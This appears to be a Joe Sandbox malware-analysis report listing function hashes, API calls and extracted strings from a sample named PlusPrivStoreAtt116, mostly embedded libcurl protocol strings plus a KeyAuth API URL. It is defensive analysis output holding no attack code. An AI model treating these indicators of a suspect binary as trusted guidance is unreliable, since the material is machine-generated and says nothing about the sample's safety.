                                        • Instruction ID: 8f3c890544a4a884d2a1af8c55397a8c9746c24d889cad766bd81a12d4627d17
                                        • Opcode Fuzzy Hash: 735474b44fecfb17f075a3ff19b93d187b15b809f496c8131696174fb3aa68e8
                                        • Instruction Fuzzy Hash: 84A00162A1AA4A80A7208B15E6A4F256A65FB98B997659031C90D868248E699A42C200
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d8085569c1db706f8df0c680955a88674b0be6f25267714de8c820d55b9c9291
                                        • Instruction ID: d1e28884b2abb70dd88881b166777c07c5396a8b7a628d2122f07385f6b326cd
                                        • Opcode Fuzzy Hash: d8085569c1db706f8df0c680955a88674b0be6f25267714de8c820d55b9c9291
                                        • Instruction Fuzzy Hash: E4A0023191DD02D0E7148B00E9D42303BB1FF94308F651031C50DC50649FBCB908C344
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$CounterPerformanceQuery
                                        • String ID: Closing connection %ld
                                        • API String ID: 3490100708-2599090834
                                        • Opcode ID: e31ef70838d5df3757b92d2210bda80089e2ab09dfffb442114cf8788270e6bc
                                        • Instruction ID: f1f2ee02e7184b71ce0d36279643232ae78f4ad4d0f55c01a85b24dfb413c4b3
                                        • Opcode Fuzzy Hash: e31ef70838d5df3757b92d2210bda80089e2ab09dfffb442114cf8788270e6bc
                                        • Instruction Fuzzy Hash: E3C1C875608B8282E750DF21E4502AD3764FF85F98F284631DE9E87699CF78E196C320
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: %s %s RTSP/1.0CSeq: %ld$%s%s%s%s%s%s%s%s$Accept$Accept-Encoding$Accept-Encoding: %s$Accept: application/sdp$CSeq$CSeq cannot be set as a custom header.$Content-Length$Content-Length: %I64d$Content-Type$Content-Type: application/sdp$Content-Type: text/parameters$Failed sending RTSP request$OPTIONS$Range$Range: %s$Referer$Referer: %s$Refusing to issue an RTSP SETUP without a Transport: header.$Refusing to issue an RTSP request [%s] without a session ID.$Session$Session ID cannot be set as a custom header.$Session: %s$Transport$Transport: %s$User-Agent
                                        • API String ID: 1294909896-2200874227
                                        • Opcode ID: a4c82bcc725e61103f523d7bac1625522059787e4daccbbb1ad99cbdf31118d3
                                        • Instruction ID: 08a0b198639c519c578dcf9c97957f13c71d4bda25064f246538e735253eabb3
                                        • Opcode Fuzzy Hash: a4c82bcc725e61103f523d7bac1625522059787e4daccbbb1ad99cbdf31118d3
                                        • Instruction Fuzzy Hash: 36028D31A0978281FF649B62E8403FAAB91BF44B98F640436CE4DC7796EFBCE5458351
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _strdupfree$strpbrk
                                        • String ID: AUTH=$ SIZE=$ SMTPUTF8$%I64d$<%s>$<%s@%s>$MAIL FROM:%s%s%s%s%s%s$Mime-Version$Mime-Version: 1.0
                                        • API String ID: 2737852498-2994854565
                                        • Opcode ID: 49e5a8093cbab499398c211c2167271c9e8bd267777574003e8ceb441dc91b87
                                        • Instruction ID: b74beeaba71f78b9c7d8679bc69fa667d5f6999f8ad3ee14e4cf1a5be6d8642f
                                        • Opcode Fuzzy Hash: 49e5a8093cbab499398c211c2167271c9e8bd267777574003e8ceb441dc91b87
                                        • Instruction Fuzzy Hash: 6AD18C22F09B5285FF11DB22A8546B92BA4BF45B8CF640531DE4E87796EFBCE945C300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$malloc$memcpy$htonl
                                        • String ID: GSSAPI handshake failure (empty security message)$GSSAPI handshake failure (invalid security data)$GSSAPI handshake failure (invalid security layer)
                                        • API String ID: 82385936-242323837
                                        • Opcode ID: 70d35f79a67b94333284927e9e998538639b5e22fc3dda229c8068922391dd39
                                        • Instruction ID: 7980dbe8b1710a155b71278301c176f2d68f96f726eb178262605cfddc0bdf57
                                        • Opcode Fuzzy Hash: 70d35f79a67b94333284927e9e998538639b5e22fc3dda229c8068922391dd39
                                        • Instruction Fuzzy Hash: 18C13F36A08B5286E790DB66E4502AE3BB4FF44B98F204435EE8D97B65DFBCE445C700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: calloc$_strdupfreehtonsmemset
                                        • String ID: %s$%s%02x%02x$AAAA$CNAME: %s$Could not DOH-resolve: %s$DOH A: %u.%u.%u.%u$DOH AAAA: $DOH Host name: %s$DOH: %s type %s for %s$TTL: %u seconds$bad error code
                                        • API String ID: 130798683-4053692942
                                        • Opcode ID: 4da9d9f1cbb209fe43fb6dcd8b467026ebfaf9e3e059f8631a373749ab627460
                                        • Instruction ID: 2d96519fbc74a3d4f540644f330519a52602a820294bc725162a3b7b238f288c
                                        • Opcode Fuzzy Hash: 4da9d9f1cbb209fe43fb6dcd8b467026ebfaf9e3e059f8631a373749ab627460
                                        • Instruction Fuzzy Hash: 79E18032A08AC286E7A08F22D4503BA7BA4FF85B98F644135EA4D87749DFBCE544C700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy
                                        • String ID: array$number overflow parsing '$object
                                        • API String ID: 1346393832-579821726
                                        • Opcode ID: 0dadecece245a67f675a5d2e96cc5f0bc4a0f7ec8ea6dd8922b7aa2d9f5add5a
                                        • Instruction ID: 112047cb77b34a14e987f6e706b1c2016a87f99bd90dfc7e26d291adafb25f03
                                        • Opcode Fuzzy Hash: 0dadecece245a67f675a5d2e96cc5f0bc4a0f7ec8ea6dd8922b7aa2d9f5add5a
                                        • Instruction Fuzzy Hash: 7312B662E18B8586FF00CB69E4443AD2B61FF457A8F604235DA6D47ADADFBCD085C340
                                        APIs
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00000000,00000000,00000000,00007FF6029EDBDF), ref: 00007FF6029EE4A6
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00000000,00000000,00000000,00007FF6029EDBDF), ref: 00007FF6029EE4CC
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,00000000,00000000,00007FF6029EDBDF), ref: 00007FF6029EE4DD
                                        • strchr.VCRUNTIME140(?,?,?,?,?,00000000,00000000,00000000,00007FF6029EDBDF), ref: 00007FF6029EE54B
                                        • strchr.VCRUNTIME140(?,?,?,?,?,00000000,00000000,00000000,00007FF6029EDBDF), ref: 00007FF6029EE57C
                                        • strchr.VCRUNTIME140(?,?,?,?,?,00000000,00000000,00000000,00007FF6029EDBDF), ref: 00007FF6029EE59C
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,00000000,00000000,00007FF6029EDBDF), ref: 00007FF6029EE5AE
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,00000000,00000000,00007FF6029EDBDF), ref: 00007FF6029EE610
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,00000000,00000000,00007FF6029EDBDF), ref: 00007FF6029EE681
                                        • strchr.VCRUNTIME140(?,?,?,?,?,00000000,00000000,00000000,00007FF6029EDBDF), ref: 00007FF6029EE698
                                        • strchr.VCRUNTIME140(?,?,?,?,?,00000000,00000000,00000000,00007FF6029EDBDF), ref: 00007FF6029EE753
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,00000000,00000000,00007FF6029EDBDF), ref: 00007FF6029EE7C7
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,00000000,00000000,00007FF6029EDBDF), ref: 00007FF6029EE7D0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: strchr$free$_strdupcalloc
                                        • String ID: LDAP$base$one$onetree$sub$subtree
                                        • API String ID: 112326314-884163498
                                        • Opcode ID: 5b60497df80a076f26ec4b03495979baa124a4041d4c6624708c24347fefd159
                                        • Instruction ID: ed2b0ecb34db227fc7160b8eea445f3fc49967fc4dece27fccea3d0754dd039c
                                        • Opcode Fuzzy Hash: 5b60497df80a076f26ec4b03495979baa124a4041d4c6624708c24347fefd159
                                        • Instruction Fuzzy Hash: 8AB1AF36A09B8282EF61DF16A4502792BA0FF48B98F684535DE8D87786FF7CE445C700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: memchrstrtol
                                        • String ID: %s (%d)$%s (%d) %s (%d)$%s (%ld)$%s (%ld)$Malformed ACK packet, rejecting$blksize$blksize is larger than max supported$blksize is smaller than min supported$blksize parsed from OACK$got option=(%s) value=(%s)$invalid blocksize value in OACK packet$invalid tsize -:%s:- value in OACK packet$requested$server requested blksize larger than allocated$tsize$tsize parsed from OACK
                                        • API String ID: 1626215102-895336422
                                        • Opcode ID: d5aa77bd481b7722d0f735f1f26a1f6737cc15dd079a17b9800053efdba2dedf
                                        • Instruction ID: 9fca3c3c5296106208f81e84c4ff54bf9f2725730501a3bd9fa57002b6bc0b6f
                                        • Opcode Fuzzy Hash: d5aa77bd481b7722d0f735f1f26a1f6737cc15dd079a17b9800053efdba2dedf
                                        • Instruction Fuzzy Hash: D261B171A08A4291EF148B57A9406B96E50BF45BE8FB04632D96EC76D6EFBCE106C340
                                        APIs
                                          • Part of subcall function 00007FF6029B6040: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C0640,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6029B2471), ref: 00007FF6029B6067
                                          • Part of subcall function 00007FF6029B6040: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C0640,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6029B2471), ref: 00007FF6029B6073
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029BC9A4
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029BC9AC
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029BC9D3
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029BC9DC
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029BCA60
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029BCA69
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: 8bit$; boundary=$; filename="$; name="$Content-Disposition$Content-Disposition: %s%s%s%s%s%s%s$Content-Transfer-Encoding$Content-Transfer-Encoding: %s$Content-Type$Content-Type: %s%s%s$application/octet-stream$attachment$form-data$multipart/$multipart/form-data$multipart/mixed$text/plain
                                        • API String ID: 1294909896-1595554923
                                        • Opcode ID: b9bc93528b88626dfd995c68e28a706383ab7ecc8f2ad09ecd60a740e55feb49
                                        • Instruction ID: 65bd31ff5e38f1a230c7541166f209ab58e13214f9674924e177b82a7f2dc39e
                                        • Opcode Fuzzy Hash: b9bc93528b88626dfd995c68e28a706383ab7ecc8f2ad09ecd60a740e55feb49
                                        • Instruction Fuzzy Hash: C9E17121B087529AFB668B1396503B96B94FF04B8CFA84436CE4DC7692DFBCE954C340
                                        APIs
                                          • Part of subcall function 00007FF6029A4320: memcpy.VCRUNTIME140(7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF6029A1B59), ref: 00007FF6029A4351
                                        • memcpy.VCRUNTIME140 ref: 00007FF6029A6496
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF6029A6528
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF6029A6569
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A66B3
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A66F2
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A6740
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A6781
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A67DE
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A6898
                                          • Part of subcall function 00007FF6029FFB18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,-3333333333333333,00007FF6029A43FE,7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF6029A1B59), ref: 00007FF6029FFB32
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A68D9
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A69A6
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A69E7
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6029A6A0A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$memcpy$Concurrency::cancel_current_taskmalloc
                                        • String ID: ; expected $; last read: '$rsing $syntax error $unexpected
                                        • API String ID: 264867259-3075834232
                                        • Opcode ID: 5e328f9cc9d509dbc5f0c620a2ea8f70044036c914e68ed5f3d7a5609f240f6d
                                        • Instruction ID: a5d491931b22b65484f89368da563a5d60864ef8c58703f28568da645ae5b43b
                                        • Opcode Fuzzy Hash: 5e328f9cc9d509dbc5f0c620a2ea8f70044036c914e68ed5f3d7a5609f240f6d
                                        • Instruction Fuzzy Hash: 3712D362F08B8285EB14CB66E44436D2B65EF447ACF244234DAAD93ADADFBCD484C340
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$_strdup$_time64callocmallocqsortstrchrstrncmp
                                        • String ID:
                                        • API String ID: 1087521380-0
                                        • Opcode ID: c54aa30acb8f7759c872955e7afee6932479ba7e1a429da66d45e5394a038d2b
                                        • Instruction ID: 368b183f43fa47fc14a7c24f13605625d1d4d38a7202a5e96f3c1e1864dd30a4
                                        • Opcode Fuzzy Hash: c54aa30acb8f7759c872955e7afee6932479ba7e1a429da66d45e5394a038d2b
                                        • Instruction Fuzzy Hash: 3CB19061A0AB4685EF568B26966437D2FE1AF44B9CF280535CE5D837C2DFBCE491C310
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: strchrstrrchr$_strdupstrstr
                                        • String ID: .$/$/$/$?
                                        • API String ID: 2325335452-1821401756
                                        • Opcode ID: 79f829142897bcacbe5969e8a8d1b9bc4139d51a05a0ba81aa01496cb51f9548
                                        • Instruction ID: 2f45e8738adf37176fba5686b0c0d0d5c84737012e449087f0680b97e96e3ec6
                                        • Opcode Fuzzy Hash: 79f829142897bcacbe5969e8a8d1b9bc4139d51a05a0ba81aa01496cb51f9548
                                        • Instruction Fuzzy Hash: A4818E22A0C68645FF668B22951037A6FD1BF567ACF684435DA8D863C7FEBCE485C301
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _strdupfree$__stdio_common_vsscanfstrchr
                                        • String ID: %c%c%c%u%c$%u,%u,%u,%u,%u,%u$%u.%u.%u.%u$Bad PASV/EPSV response: %03d$Can't resolve new host %s:%hu$Can't resolve proxy host %s:%hu$Connecting to %s (%s) port %d$Couldn't interpret the 227-response$Illegal port number in EPSV reply$Skip %u.%u.%u.%u for data connection, re-use %s instead$Weirdly formatted EPSV reply
                                        • API String ID: 3103143820-2414412286
                                        • Opcode ID: a36134f17173d3b68bf390f24a32a1e2c938ac05ee6e864fa08eba1b0f79a6e0
                                        • Instruction ID: 2014c7149aa3c037bc2703c9df5b4ca5645b2347504258ce5bbbce6cb98dbfaf
                                        • Opcode Fuzzy Hash: a36134f17173d3b68bf390f24a32a1e2c938ac05ee6e864fa08eba1b0f79a6e0
                                        • Instruction Fuzzy Hash: 7FD19732B0868292EF54DB22E5402B9ABA4FF85B9CF641431DB4D83B56EFBCE550C701
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: Unsupported proxy '%s', libcurl is built without the HTTPS-proxy support.$Unsupported proxy scheme for '%s'$Unsupported proxy syntax in '%s'$http$https$socks$socks4$socks4a$socks5$socks5h
                                        • API String ID: 1294909896-874090715
                                        • Opcode ID: 52d69756cb498b6cbae8a9f5df6243dd581b2c397a197d2a953b2a52a7e64667
                                        • Instruction ID: c3cec43ae607c0eec635111741581022ece07a485a18730c790f65b3caa9dea0
